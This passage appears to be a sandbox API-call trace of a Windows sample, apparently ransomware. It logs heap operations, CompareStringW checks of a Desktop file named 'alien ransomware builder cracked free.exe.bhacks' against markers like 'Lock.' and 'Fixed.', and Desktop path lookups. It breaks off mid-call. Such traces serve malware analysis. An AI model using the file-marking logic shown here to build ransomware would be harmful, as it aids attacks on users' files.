HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa90e8 | out: hHeap=0x2af0000) returned 1 [0088.317] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa92f8 | out: hHeap=0x2af0000) returned 1 [0088.317] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9058 | out: hHeap=0x2af0000) returned 1 [0088.317] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0088.317] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e8c0 | out: hHeap=0x2af0000) returned 1 [0088.317] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0088.317] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0088.317] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71db8 [0088.317] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71f88 [0088.317] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9268 [0088.317] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9178 [0088.317] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71de8 [0088.317] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71e88 [0088.317] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71e88 | out: hHeap=0x2af0000) returned 1 [0088.317] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa91c0 [0088.317] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71de8 | out: hHeap=0x2af0000) returned 1 [0088.317] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9208 [0088.317] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71de8 [0088.317] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa90b8 [0088.317] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71de8 | out: hHeap=0x2af0000) returned 1 [0088.317] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="alien ransomware builder cracked free.exe.bhacks", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0088.317] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="lien ransomware builder cracked free.exe.bhacks", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0088.317] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ien ransomware builder cracked free.exe.bhacks", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0088.317] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="en ransomware builder cracked free.exe.bhacks", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0088.317] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="n ransomware builder cracked free.exe.bhacks", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0088.317] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=" ransomware builder cracked free.exe.bhacks", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0088.318] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ransomware builder cracked free.exe.bhacks", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0088.318] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ansomware builder cracked free.exe.bhacks", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0088.318] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="nsomware builder cracked free.exe.bhacks", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0088.318] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="somware builder cracked free.exe.bhacks", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0088.318] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="omware builder cracked free.exe.bhacks", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0088.318] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="mware builder cracked free.exe.bhacks", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0088.318] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ware builder cracked free.exe.bhacks", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0088.318] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="are builder cracked free.exe.bhacks", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0088.318] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="re builder cracked free.exe.bhacks", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0088.318] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="e builder cracked free.exe.bhacks", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0088.318] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=" builder cracked free.exe.bhacks", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0088.318] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="builder cracked free.exe.bhacks", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0088.318] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="uilder cracked free.exe.bhacks", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0088.318] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ilder cracked free.exe.bhacks", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0088.318] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="lder cracked free.exe.bhacks", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0088.318] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="der cracked free.exe.bhacks", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0088.318] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="er cracked free.exe.bhacks", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0088.318] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="r cracked free.exe.bhacks", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0088.318] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=" cracked free.exe.bhacks", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0088.318] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="cracked free.exe.bhacks", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0088.318] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="racked free.exe.bhacks", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0088.318] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="acked free.exe.bhacks", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0088.318] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="cked free.exe.bhacks", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0088.318] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ked free.exe.bhacks", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0088.318] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ed free.exe.bhacks", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0088.318] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="d free.exe.bhacks", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0088.318] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=" free.exe.bhacks", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0088.318] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="free.exe.bhacks", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0088.318] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ree.exe.bhacks", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0088.318] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ee.exe.bhacks", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0088.318] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="e.exe.bhacks", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0088.318] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".exe.bhacks", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0088.318] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="exe.bhacks", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0088.318] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="xe.bhacks", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0088.319] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="e.bhacks", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0088.319] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".bhacks", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0088.319] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="bhacks", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0088.319] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="hacks", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0088.319] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa91c0 | out: hHeap=0x2af0000) returned 1 [0088.319] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9178 | out: hHeap=0x2af0000) returned 1 [0088.319] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa90b8 | out: hHeap=0x2af0000) returned 1 [0088.319] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9208 | out: hHeap=0x2af0000) returned 1 [0088.319] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9268 | out: hHeap=0x2af0000) returned 1 [0088.319] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5eb00 [0088.319] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0088.319] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71e88 [0088.319] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9178 [0088.319] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9298 [0088.319] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71db8 [0088.319] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71de8 [0088.319] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9208 [0088.319] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa92c8 [0088.319] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71f88 [0088.319] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa92e0 [0088.319] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9250 [0088.319] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71eb8 [0088.319] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa91c0 [0088.319] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa92f8 [0088.319] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71ea8 [0088.319] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x62) returned 0x2a68440 [0088.319] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71eb8 [0088.320] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="alien ransomware builder cracked free.exe.bhacks", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0088.320] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="lien ransomware builder cracked free.exe.bhacks", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0088.320] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ien ransomware builder cracked free.exe.bhacks", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0088.320] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="en ransomware builder cracked free.exe.bhacks", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0088.320] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="n ransomware builder cracked free.exe.bhacks", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0088.320] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=" ransomware builder cracked free.exe.bhacks", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0088.320] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ransomware builder cracked free.exe.bhacks", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0088.320] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ansomware builder cracked free.exe.bhacks", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0088.320] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="nsomware builder cracked free.exe.bhacks", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0088.320] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="somware builder cracked free.exe.bhacks", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0088.320] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="omware builder cracked free.exe.bhacks", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0088.320] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="mware builder cracked free.exe.bhacks", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0088.320] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ware builder cracked free.exe.bhacks", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0088.320] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="are builder cracked free.exe.bhacks", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0088.320] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="re builder cracked free.exe.bhacks", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0088.320] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="e builder cracked free.exe.bhacks", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0088.320] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=" builder cracked free.exe.bhacks", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0088.320] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="builder cracked free.exe.bhacks", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0088.320] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="uilder cracked free.exe.bhacks", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0088.320] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ilder cracked free.exe.bhacks", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0088.320] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="lder cracked free.exe.bhacks", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0088.320] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="der cracked free.exe.bhacks", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0088.320] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="er cracked free.exe.bhacks", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0088.320] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="r cracked free.exe.bhacks", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0088.320] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=" cracked free.exe.bhacks", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0088.320] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="cracked free.exe.bhacks", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0088.320] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="racked free.exe.bhacks", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0088.320] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="acked free.exe.bhacks", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0088.320] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="cked free.exe.bhacks", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0088.320] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ked free.exe.bhacks", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0088.320] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ed free.exe.bhacks", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0088.320] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="d free.exe.bhacks", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0088.320] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=" free.exe.bhacks", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0088.320] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="free.exe.bhacks", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0088.320] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ree.exe.bhacks", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0088.320] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ee.exe.bhacks", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0088.321] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="e.exe.bhacks", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0088.321] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".exe.bhacks", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0088.321] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="exe.bhacks", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0088.321] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="xe.bhacks", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0088.321] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="e.bhacks", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0088.321] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".bhacks", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0088.321] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="bhacks", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0088.321] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x70) returned 0x2a75ba0 [0088.321] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9220 [0088.321] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa90b8 [0088.321] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0088.321] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77cb0 [0088.321] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72708 [0088.321] CharUpperBuffW (in: lpsz="A2100602512", cchLength=0xb | out: lpsz="A2100602512") returned 0xb [0088.321] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa90e8 [0088.321] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a72738 [0088.321] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9328 [0088.321] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9160 [0088.321] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72708 [0088.321] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9250 [0088.321] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9178 [0088.321] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72698 [0088.321] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9040 [0088.321] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xca) returned 0x2a684b0 [0088.321] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72698 [0088.321] CharUpperBuffW (in: lpsz="DesktopDir", cchLength=0xa | out: lpsz="DESKTOPDIR") returned 0xa [0088.321] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9058 [0088.321] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa92c8 [0088.321] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aa92f8 [0088.321] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9268 [0088.322] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aa91c0 [0088.322] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72628 [0088.322] SHGetFolderPathW (in: hwnd=0x0, csidl=16, hToken=0x0, dwFlags=0x0, pszPath=0x8cf3a8 | out: pszPath="C:\\Users\\FD1HVy\\Desktop") returned 0x0 [0088.322] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9298 [0088.322] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x30) returned 0x2aa6728 [0088.322] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72648 [0088.322] CharUpperBuffW (in: lpsz="DesktopDir", cchLength=0xa | out: lpsz="DESKTOPDIR") returned 0xa [0088.322] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9220 [0088.322] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9250 [0088.322] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aa9268 [0088.322] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa92c8 [0088.322] SHGetFolderPathW (in: hwnd=0x0, csidl=16, hToken=0x0, dwFlags=0x0, pszPath=0x8cf3a8 | out: pszPath="C:\\Users\\FD1HVy\\Desktop") returned 0x0 [0088.322] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa92e0 [0088.322] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x30) returned 0x2aa61e8 [0088.322] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72708 [0088.322] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0088.322] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72a08 [0088.322] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72b58 [0088.322] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9568 [0088.322] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9448 [0088.322] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72a38 [0088.322] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9460 [0088.322] CharUpperBuffW (in: lpsz="SSA2100602512", cchLength=0xd | out: lpsz="SSA2100602512") returned 0xd [0088.322] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0088.322] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0088.322] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9448 [0088.322] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72a08 [0088.323] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0088.323] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9520 [0088.323] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72a08 [0088.323] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0088.323] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9478 [0088.323] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72a08 [0088.323] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0088.323] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa95b0 [0088.323] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72a08 [0088.323] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop/alien ransomware builder cracked free.exe.bhacks", lpFindFileData=0x8cf170 | out: lpFindFileData=0x8cf170*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2584d4ec, ftCreationTime.dwHighDateTime=0x1d5dff9, ftLastAccessTime.dwLowDateTime=0x2584d4ec, ftLastAccessTime.dwHighDateTime=0x1d5dff9, ftLastWriteTime.dwLowDateTime=0x25c9f900, ftLastWriteTime.dwHighDateTime=0x1d5dff9, nFileSizeHigh=0x0, nFileSizeLow=0xf0b30, dwReserved0=0x0, dwReserved1=0x0, cFileName="alien ransomware builder cracked free.exe.bhacks", cAlternateFileName="ALIENR~1.BHA")) returned 0x9a3cc0 [0088.323] FindClose (in: hFindFile=0x9a3cc0 | out: hFindFile=0x9a3cc0) returned 1 [0088.323] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa96a0 | out: hHeap=0x2af0000) returned 1 [0088.323] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9688 | out: hHeap=0x2af0000) returned 1 [0088.323] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa95b0 | out: hHeap=0x2af0000) returned 1 [0088.323] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a73118 | out: hHeap=0x2af0000) returned 1 [0088.323] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9790 | out: hHeap=0x2af0000) returned 1 [0088.323] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a730a8 | out: hHeap=0x2af0000) returned 1 [0088.323] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9778 | out: hHeap=0x2af0000) returned 1 [0088.323] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77cd8 | out: hHeap=0x2af0000) returned 1 [0088.324] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72a08 | out: hHeap=0x2af0000) returned 1 [0088.324] PeekMessageW (in: lpMsg=0x8cf708, 